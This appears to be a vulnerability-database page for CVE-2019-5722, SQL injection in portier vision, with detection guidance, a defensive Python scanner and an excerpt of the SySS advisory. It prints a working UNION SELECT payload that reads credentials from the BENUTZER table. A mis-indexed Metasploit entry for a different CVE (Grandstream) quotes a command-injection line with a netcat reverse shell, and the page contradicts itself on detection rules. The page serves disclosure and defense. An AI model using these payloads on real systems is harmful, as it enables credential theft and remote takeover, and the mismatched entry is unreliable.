CVE-2019-5722
Published: 2019-03-21
Priority: P2 (59) · Severity: critical · CVSS 3.0 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Public exploit: yes (see the Exploit-DB entry below)
EPSS: 3.90% (89.0th percentile)
An issue was discovered in portier vision 4.4.4.2 and 4.4.4.6. Due to a lack of user input validation in parameter handling, it has various SQL injections, including on the login form, and on the search form for a key ring number.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| portier | portier | — | — |
| portier | portier | — | — |
Detection & IOCs (extracted from sources)

Observed injection payload, entered in the key ring number search field:

```sql
') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a
```

Resulting statement as it reaches the database:

```sql
SELECT BUND.BUND_ID, BUND.BUNDNUMMER, BUND.BESCHREIBUNG, BUND.ABTEILUNG, BUND.BEREICH, BUND.KOSTENSTELLE, DEPOT.BEZEICHNUNG as DEP_BEZEICHNUNG, BUND.BEMERKUNG_1, BUND.BEMERKUNG_2, BUND.BEMERKUNG_3 FROM BUND BUND LEFT OUTER JOIN DEPOT DEPOT ON DEPOT.DEPOT_ID = BUND.DEPOT_ID WHERE ( 1 = 1 ) AND (upper(BUND.BUNDNUMMER) LIKE '') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a%')
```
Detection guidance:

- Monitor database traffic for UNION SELECT payloads targeting the BENUTZER table, particularly queries that read the user_kz and passwort columns; this pattern indicates credential harvesting via SQL injection in the key ring number search field.
- The application talks to its database (Firebird or MS SQL) in plain text, so the injected queries are visible in network captures of the database connection. Monitor for anomalous UNION SELECT statements in database wire traffic on the relevant DB port.
- The username field of the login form is also injectable; monitor for SQL metacharacters (single quotes, UNION keywords, and the like) in authentication requests over the portier vision client-to-database connection.
- Stacked queries do not work against either supported backend, so UNION-based injection is the primary viable technique. Detection should focus on UNION SELECT patterns in queries that filter on BUND.BUNDNUMMER and in login parameters.

Context from the advisory:

- The payload structure differs slightly between the Firebird and MS SQL backends: Firebird does not accept UNION SELECT when the full query is terminated by an ORDER BY clause, which reduces the number of exploitable fields on that backend.
- Authentication bypass through the login form injection is NOT possible, because the authentication logic is implemented client-side rather than server-side; however, theft of (encrypted) supervisor account credentials remains a high-impact attack path.
- No vendor patch was available at the time of disclosure; the solution status was listed as Open, and SySS GmbH was not aware of a fix from the manufacturer.
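The guidance above amounts to two checks a defender can run over captured database statements and login parameters: flag a UNION SELECT that reads credential columns from BENUTZER (especially when it follows the BUND.BUNDNUMMER search filter), and flag SQL metacharacters in the login username. The following Python is an added example written for this page, not code from SySS, the advisory, or the portier vendor; the sample statements are constructed (the injected one reproduces the query shown above), and the rule names and severities are this example's own choices.

```python
import re
from dataclasses import dataclass

# Patterns derived from the advisory's description of the injection.
UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)
FROM_BENUTZER = re.compile(r"\bFROM\s+BENUTZER\b", re.IGNORECASE)
BUNDNUMMER_FILTER = re.compile(r"BUND\.BUNDNUMMER", re.IGNORECASE)
CREDENTIAL_COLUMNS = ("user_kz", "passwort")  # user id and password columns named in the advisory

# Metacharacters worth flagging in the login form's username parameter.
LOGIN_METACHARS = {
    "single-quote": re.compile(r"'"),
    "union-keyword": re.compile(r"\bUNION\b", re.IGNORECASE),
    "comment-sequence": re.compile(r"--|/\*"),
}


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def analyze_statement(sql: str) -> list[Finding]:
    """Inspect one SQL statement captured from the client-to-database connection."""
    findings: list[Finding] = []
    union = UNION_SELECT.search(sql)
    if union is None:
        return findings  # no UNION, nothing the advisory's technique would produce
    head, tail = sql[:union.start()], sql[union.end():]

    if FROM_BENUTZER.search(tail):
        cols = [c for c in CREDENTIAL_COLUMNS if re.search(rf"\b{c}\b", tail, re.IGNORECASE)]
        if cols:
            findings.append(Finding("union-benutzer-credentials", "high",
                                    "UNION SELECT reads " + ", ".join(cols) + " from BENUTZER"))
        else:
            findings.append(Finding("union-benutzer", "medium", "UNION SELECT against BENUTZER"))
    else:
        findings.append(Finding("union-select", "medium", "UNION SELECT appended to application query"))

    # The advisory's entry point: the key ring number search filter on BUND.BUNDNUMMER.
    if BUNDNUMMER_FILTER.search(head):
        findings.append(Finding("bundnummer-search-injection", "high",
                                "UNION follows the key ring number search filter"))
    return findings


def check_login_field(value: str) -> list[str]:
    """Return the names of metacharacter rules that match a login username value."""
    return [name for name, rx in LOGIN_METACHARS.items() if rx.search(value)]


# Constructed sample of captured statements; the second reproduces the advisory's injected query.
SAMPLE_STATEMENTS = [
    "SELECT BUND.BUND_ID, BUND.BUNDNUMMER FROM BUND BUND WHERE ( 1 = 1 ) "
    "AND (upper(BUND.BUNDNUMMER) LIKE 'A-100%')",
    "SELECT BUND.BUND_ID, BUND.BUNDNUMMER, BUND.BESCHREIBUNG, BUND.ABTEILUNG, BUND.BEREICH, "
    "BUND.KOSTENSTELLE, DEPOT.BEZEICHNUNG as DEP_BEZEICHNUNG, BUND.BEMERKUNG_1, BUND.BEMERKUNG_2, "
    "BUND.BEMERKUNG_3 FROM BUND BUND LEFT OUTER JOIN DEPOT DEPOT ON DEPOT.DEPOT_ID = BUND.DEPOT_ID "
    "WHERE ( 1 = 1 ) AND (upper(BUND.BUNDNUMMER) LIKE '') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 "
    "FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a%')",
    "SELECT user_kz FROM BENUTZER WHERE user_kz = 'jdoe'",
]


def scan(statements: list[str]) -> list[list[str]]:
    """Rule names triggered per statement, in input order."""
    return [[f.rule for f in analyze_statement(s)] for s in statements]


if __name__ == "__main__":
    for sql, rules in zip(SAMPLE_STATEMENTS, scan(SAMPLE_STATEMENTS)):
        print(rules or "clean", "<-", sql[:60], "...")
    print(check_login_field("o'brien"))
```

The login check is deliberately a weak signal on its own: a legitimate username such as o'brien trips the single-quote rule, so in practice it should be correlated with the wire-traffic rules rather than alerted on in isolation. The statement check is stronger because the application's own key ring search never emits a UNION, so any UNION SELECT following the BUND.BUNDNUMMER filter is anomalous regardless of which columns it reads.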
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
No detection rules found.
Exploit-DB
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection (exploitdb · 2019-01-14 · CVSS 9.8 · CVE-2019-5722 [CRITICAL])
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2018-012
Product: PORTIER
Affected Version(s): 4.4.4.2, 4.4.4.6
Tested Version(s): 4.4.4.2, 4.4.4.6
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: HIGH
Solution Status: Open
Manufacturer Notification: 2018-06-13
Solution Date: -
Public Disclosure: 2018-01-09
CVE Reference: CVE-2019-5722
Author of Advisory: Christian Pappas, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
portier vision is a rich client application for managing door keys allocated
to certain persons or group of persons.
The manufacturer describes the product as follows (see [1]):
"portier® vision
* manages locking systems and access rig
Metasploit
Grandstream UCM62xx IP PBX sendPasswordEmail RCE (metasploit · CVE-2020-5722 [HIGH] · CVSS 8.8)
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e
No writeups or analysis indexed.
References:

- http://packetstormsecurity.com/files/151117/PORTIER-4.4.4.2-4.4.4.6-SQL-Injection.html
- https://seclists.org/bugtraq/2019/Jan/7
- https://www.exploit-db.com/exploits/46163/
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-012.txt